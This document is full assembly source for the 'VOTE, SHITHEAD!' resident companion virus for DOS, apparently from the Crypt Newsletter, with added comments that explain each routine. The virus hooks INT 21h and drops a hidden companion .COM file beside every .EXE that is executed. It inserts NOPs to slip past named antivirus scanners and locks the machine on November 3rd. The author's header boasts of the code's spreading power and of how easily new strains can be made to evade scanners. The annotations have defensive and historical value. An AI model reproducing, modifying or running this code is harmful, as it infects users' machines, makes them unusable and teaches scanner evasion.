


;****************************************************************************
;* VOTE, SHITHEAD! virus Edited by URNST KOUCH for the Crypt Newsletter 7.
;*
;* TASM/MASM compatible source listing
;*
;* VOTE, SHITHEAD is a resident, companion virus based upon Little
;* Brother code and library .asm routines extracted from Nowhere Man's VCL.
;* It is also 'patched' with three 'nops' (they are commented) which
;* effectively blind a number of a-v scanners. This simple alteration
;* demonstrates a practical benefit of source code possession: quick
;* generation of different virus strains becomes a task within anyone's
;* reach. The only tools needed are a number of virus scanners and patience.
;*
;* In any case, the VOTE virus is just the ideal sample needed for
;* judicious virus action. It is a PERFECT tool for viral spreading for
;* a number of reasons. First, it is a FAST infector. Once resident
;* VOTE will create a companion file for ANY .EXE executed on ANY drive
;* and it will do it so quickly that most users, even suspicious ones,
;* will not notice any slowdown or glitches in machine operation.
;* Second, 'companion-ed' .EXE's will continue to load and function
;* properly when VOTE is resident. At the start of the day's computing,
;* the first 'companion-ed' .EXE executed will misfire ONCE as the virus
;* becomes resident. If it is re-called it will function perfectly.
;* Third, VOTE like the INSUFF viruses in the last newsletter strikes
;* directly at anti-virus suites vulnerable to 'spawning' infections (many
;* no-names, CPAV, NAV) and creates 'hidden' companion files, an improvement
;* over the original virus's modus operandi which left them out in plain
;* sight in the directory. Last, VOTE is very small. In RAM, it is not
;* discernible, taking up slightly less than 0.25k. Characteristically,
;* this is NOT reported by a mem /c display. In fact,
;* VOTE is almost invisible to any number of standard diagnostic
;* tests. Memory maps by QEMM and Norton's SYSINFO will
;* report INT 21 hooked differently. But unless the user can compare
;* an uncontaminated INTERRUPT report with one when the virus IS present,
;* it's unlikely he'll know anything is different. Even then, VOTE is hard
;* to notice.
;*
;* On election day, November 3rd, VOTE will lock an infected machine into
;* a loop as it displays a "DID YOU VOTE, SHITHEAD??" query repetitively
;* across the monitor. Computing will be impossible on Nov. 3rd
;* unless VOTE is removed from the machine, a task accomplished by unmasking
;* all the hidden .COM files and deleting them while
;* the virus is NOT resident. At all other times, VOTE is almost completely
;* transparent.
;****************************************************************************
code segment
assume cs:code,ds:code,es:nothing
.RADIX 16 ; default radix is hex: un-suffixed numerals below (e.g. 'int 21', 'mov al,03') are hexadecimal
;****************************************************************************
;* Resident work area. These labels sit just PAST 'endit', i.e. beyond the
;* bytes that are copied into memory and written to companion files (both
;* lengths are endit - begin), so they are scratch storage of the resident
;* copy and never part of the on-disk image.
;****************************************************************************
oi21 equ endit ; dword: saved original INT 21h vector (offset word, then segment word)
nameptr equ endit+4 ; dword: far pointer (the caller's DS:DX) to the ASCIIZ name passed to INT 21h/4B00h
DTA equ endit+8 ; disk transfer area used by the find-first calls (file size low word read at DTA+1Ah)
;****************************************************************************
;* Check for activation date, then proceed to installation!
;****************************************************************************
org 100h ; .COM image: execution starts at PSP+100h
;-----------------------------------------------------------------------------
; begin: entry point of the companion .COM.
;  1. Trigger check: if the DOS date is 3 November, loop forever printing
;     the message (machine unusable until rebooted).
;  2. Otherwise copy the body (endit - begin bytes) to 0044h:0100h, save the
;     current INT 21h vector into the resident copy's oi21, point INT 21h at
;     the resident ni21, and terminate.  If the current INT 21h offset already
;     equals ni21's offset the install is skipped (already resident).
; Analyst note: the resident copy lives at segment 0044h (linear 0540h),
; memory that is not allocated through DOS, which is why the author states
; MEM does not list it; an INT 21h vector pointing into segment 0044h is the
; in-memory indicator.  Only the vector OFFSET is compared for the
; already-resident test, not the segment.
;-----------------------------------------------------------------------------
begin:
call get_day ; AX = day of month (from INT 21h/2Ah, DL sign-extended)
cmp ax,0003h ; the 3rd?
jne realstrt ; no: skip the payload and go resident
call get_month ; AX = month (DH sign-extended)
cmp ax,000Bh ; November (11)?
jne realstrt ; no: skip the payload and go resident
; 3 November: payload. The message (ending in two BEL characters and the
; '$' terminator INT 21h/09h needs) is printed in an endless loop.
blooie: mov dx, offset shithead ;load 'shithead' message
mov ah,9 ;display it and loop
int 21h ;endlessly until
jmp blooie ;user becomes ill and reboots
realstrt: mov ax,0044h ;destination segment of the resident copy (0044h:0100h = linear 0540h)
nop ;a 'nop' to confuse tbSCAN
mov es,ax
nop ;a 'nop' to confuse Datatechnik's AVscan
mov di,0100h
mov si,di ;copy CS:0100h -> 0044h:0100h
mov cx,endit - begin ;length of SHITHEAD into cx
rep movsb ;after this CX = 0
mov ds,cx ;CX is 0, so DS = 0000h = interrupt vector table
mov si,0084h ;offset of the INT 21h vector in the IVT (21h * 4)
mov di,offset oi21 ;ES:DI -> oi21 inside the RESIDENT copy (ES = 0044h)
mov dx,offset ni21
lodsw ;AX = offset of the current INT 21h handler
cmp ax,dx ;same offset as ni21 -> assume already resident
je cancel ; and skip installation
stosw ;save original INT 21h offset ...
movsw ;... and segment into the resident copy's oi21
push es ;DS = 0044h so that DS:DX = resident ni21
pop ds
mov ax,2521h ;INT 21h/25h: set INT 21h vector to DS:DX
int 21h
cancel: ret ;returns via the word DOS leaves on a .COM's stack, ending the program
; (presumably the PSP's INT 20h - the author's "misfires ONCE" for the first .EXE run)
;****************************************************************************
;* File-extension masks for checking and naming routines;message text
;****************************************************************************
; Extension texts: 3 characters plus NUL. change_ext copies all four bytes
; (two movsw), so the terminator is rewritten along with the letters.
EXE_txt db 'EXE',0
COM_txt db 'COM',0
; Payload text for INT 21h/09h (see 'blooie' in begin).
SHITHEAD db "DID YOU VOTE, SHITHEAD??"
db 07h,07h,'$' ;two BEL characters, then the '$' terminator AH=09h requires
;****************************************************************************
;* Interrupt handler 24
;****************************************************************************
; ni24: INT 24h (critical error) handler installed only while the companion
; file is being created/written (see infect), then removed again.
ni24: mov al,03 ;AL = 3 = 'fail' the failing DOS call
iret ;so no critical-error prompt is shown
;on attempted writes to protected disks
;****************************************************************************
;* Interrupt handler 21
;****************************************************************************
;-----------------------------------------------------------------------------
; ni21: resident INT 21h handler.
; Filters for AX == 4B00h exactly (EXEC, load-and-execute); other 4Bh
; subfunctions and every other call fall straight through.  On a match,
; 'infect' runs with DS:DX still pointing at the program name supplied by the
; caller.  The saved registers and flags are then restored and control is
; chained to the original handler through the vector saved in oi21.
; Analyst note: every EXEC while resident passes through infect before the
; program loads; no other DOS call is intercepted (no directory stealth).
;-----------------------------------------------------------------------------
ni21: pushf
push es
push ds
push ax
push bx
push dx
cmp ax,4B00h ;EXEC with AL = 00 (load and execute) only
jne exit ;anything else: pass through untouched
doit: call infect ;DS:DX -> ASCIIZ program name (caller's registers)
exit: pop dx ;restore what was saved above
pop bx
pop ax
pop ds
pop es
popf
jmp dword ptr cs:[oi21] ;far jmp to the original INT 21h handler (saved at install)
;****************************************************************************
;* Try to infect a file (ptr to ASCIIZ-name is DS:DX)
;****************************************************************************
;-----------------------------------------------------------------------------
; infect: called from ni21 for INT 21h/4B00h.
; In:  DS:DX -> ASCIIZ path of the program about to be executed.
; Out: the caller's name buffer may have been rewritten IN PLACE (see
;      change_ext); the caller's DTA is saved and restored.
; Flow:
;  .EXE target: rewrite the buffer to .COM, create that file with attributes
;       27h (read-only, hidden, system, archive), write endit - begin bytes of
;       the virus body into it, close it, then rewrite the buffer back to
;       .EXE so the original program still runs.  Ctrl-Break checking is
;       switched off and INT 24h is pointed at ni24 for the duration; both
;       are restored afterwards.
;  .COM target: if its size (low word at DTA+1Ah) equals the virus length it
;       is a companion; if the matching .EXE exists the buffer is rewritten
;       to .EXE so DOS executes the real program instead of the companion.
;  any other extension: untouched.
; Analyst note: the on-disk artifact is a hidden/system/read-only .COM of
; exactly endit - begin bytes beside each executed .EXE; find-first is
; issued with mask 27h so those hidden files are matched.
;-----------------------------------------------------------------------------
infect: cld
mov word ptr cs:[nameptr],dx ;save the caller's DS:DX -> filename
mov word ptr cs:[nameptr+2],ds
mov ah,2Fh ;INT 21h/2Fh: ES:BX = caller's DTA
int 21
push es ;kept on the stack until 'return'
push bx
push cs ;DS = CS from here on
pop ds
mov dx,offset DTA ;INT 21h/1Ah: DTA = resident work area
mov ah,1Ah
int 21
call searchpoint ;ES:DI -> first character of the extension
push di ;cmpsb advances DI; keep the extension pointer
mov si,offset COM_txt ;extension == 'COM'?
mov cx,3
rep cmpsb
pop di
jz do_com ;yes: companion check
mov si,offset EXE_txt ;extension == 'EXE'?
nop ;'nop' to confuse SCAN v95b.
mov cl,3 ;CH is already 0 from the 'mov cx,3' above
rep cmpsb
jnz return ;neither: leave the name alone
do_exe: mov si,offset COM_txt ;rewrite the name buffer to .COM
nop ;another 'nop' to confuse SCAN
call change_ext
mov ax,3300h ;INT 21h/3300h: DL = current Ctrl-Break check state
nop
int 21
push dx ;saved for the restore at return1
cwd ;DX = 0 (AX bit 15 is clear) -> new state 'off'
inc ax ;AX = 3301h: set Ctrl-Break check to DL
push ax ;3301h kept for the restore
int 21
mov ax,3524h ;INT 21h/3524h: ES:BX = current INT 24h vector
int 21
push bx ;saved for the restore at return1
push es
push cs ;DS:DX = CS:ni24
pop ds ;virus handles machine
mov dx,offset ni24 ;exits on attempted writes
mov ah,25h ;AX = 2524h (AL still 24h from the 35h call, assumed unchanged by it)
push ax ;2524h kept for the restore
int 21 ;INT 21h/25h: INT 24h -> ni24
lds dx,dword ptr [nameptr] ;DS:DX -> name buffer, now ending in .COM (DS was CS)
mov ah,03Ch ;INT 21h/3Ch: create file
mov cx,00100111b ;attributes 27h: read-only + hidden + system + archive
int 021h ;AX = handle on success (no error check is made here)
; do it
xchg bx,ax ;BX = handle
push cs
pop ds
mov cx,endit - begin ;write CS:begin .. endit (the body only; the work area past endit is not written)
mov dx,offset begin
mov ah,40h ;INT 21h/40h: write to handle
int 21
mov ah,3Eh ;INT 21h/3Eh: close handle
int 21
return1: pop ax ;AX = 2524h: restore INT 24h to the saved DS:DX
pop ds ;saved ES (segment)
pop dx ;saved BX (offset)
int 21
pop ax ;AX = 3301h: restore Ctrl-Break state
pop dx ;saved DL
int 21
mov si,offset EXE_txt ;rewrite the name buffer back to .EXE
call change_ext ;so the caller's EXEC loads the original program
return: mov ah,1Ah ;INT 21h/1Ah: restore the caller's DTA
pop dx ;saved BX
pop ds ;saved ES
int 21
ret
do_com: call findfirst ;look the .COM up (mask 27h, so hidden files count)
cmp word ptr cs:[DTA+1Ah],endit - begin ;file size low word == virus length -> it is a companion
jne return ;a real .COM: leave the name alone
mov si,offset EXE_txt ;does the matching .EXE exist?
call change_ext
call findfirst
jnc return ;found: name buffer now says .EXE, so the real program runs
mov si,offset COM_txt ;not found: put .COM back
call change_ext
jmp short return
;****************************************************************************
;* Search beginning of extension for name we will usurp
;****************************************************************************
; searchpoint: locate the extension in the saved filename.
; Out: ES:DI -> first character of the 3-letter extension.
; Assumes the name ends in ".xxx" followed by NUL (only DI-4 is used).
searchpoint: les di,dword ptr cs:[nameptr] ;ES:DI -> saved filename
mov ch,0FFh ;large count for the scan (only CH is set; CL is whatever the caller left)
mov al,0 ;scan for the NUL terminator
repnz scasb ;DI ends one past the NUL
sub di,4 ;back up over NUL + 3 extension characters
ret
;****************************************************************************
;* Change the extension of the filename (CS:SI -> ext)
;****************************************************************************
; change_ext: overwrite the extension of the saved filename.
; In:  CS:SI -> 4-byte replacement (3 characters + NUL, i.e. EXE_txt or COM_txt).
; Note: the buffer written is the caller's own DS:DX string from the EXEC
; call (via nameptr), so the rename happens in place, not on disk.
change_ext: call searchpoint ;ES:DI -> extension
push cs
pop ds ;DS:SI -> replacement text
movsw ;copy 4 bytes: 3 characters + NUL
movsw
ret
;****************************************************************************
;* Find the file
;****************************************************************************
; findfirst: INT 21h/4Eh on the saved filename.
; Out: result record in the DTA (file size low word at DTA+1Ah), CF set if not found.
; Assumes DS = CS on entry (nameptr is read DS-relative) and CH = 0.
findfirst: lds dx,dword ptr [nameptr] ;DS:DX -> filename
mov cl,27h ;search attributes include hidden/system/read-only so hidden companions are matched
mov ah,4Eh ;INT 21h/4Eh: find first matching file
int 21
ret
;****************************************************************************
;* Get the day off the system for activation checking
;****************************************************************************
; get_day: AX = day of month, via INT 21h/2Ah (DL = day).
; Clobbers CX, DX (the date call's other outputs).
get_day:
mov ah,02Ah ; DOS get date function
int 021h
mov al,dl ; Copy day into AL
cbw ; Sign-extend AL into AX
ret ; Get back to caller
;*************************************************************************
;* Get the month off the system for activation checking
;*************************************************************************
; get_month: AX = month (1-12), via INT 21h/2Ah (DH = month).
; Clobbers CX, DX (the date call's other outputs).
get_month:
mov ah,02Ah ; DOS get date function
int 021h
mov al,dh ; Copy month into AL
cbw ; Sign-extend AL into AX
ret ; Get back to caller
endit: ; end of the image; endit - begin is the copy/write length and the
; companion-file size used for detection; oi21/nameptr/DTA start here
code ends
end begin ; entry point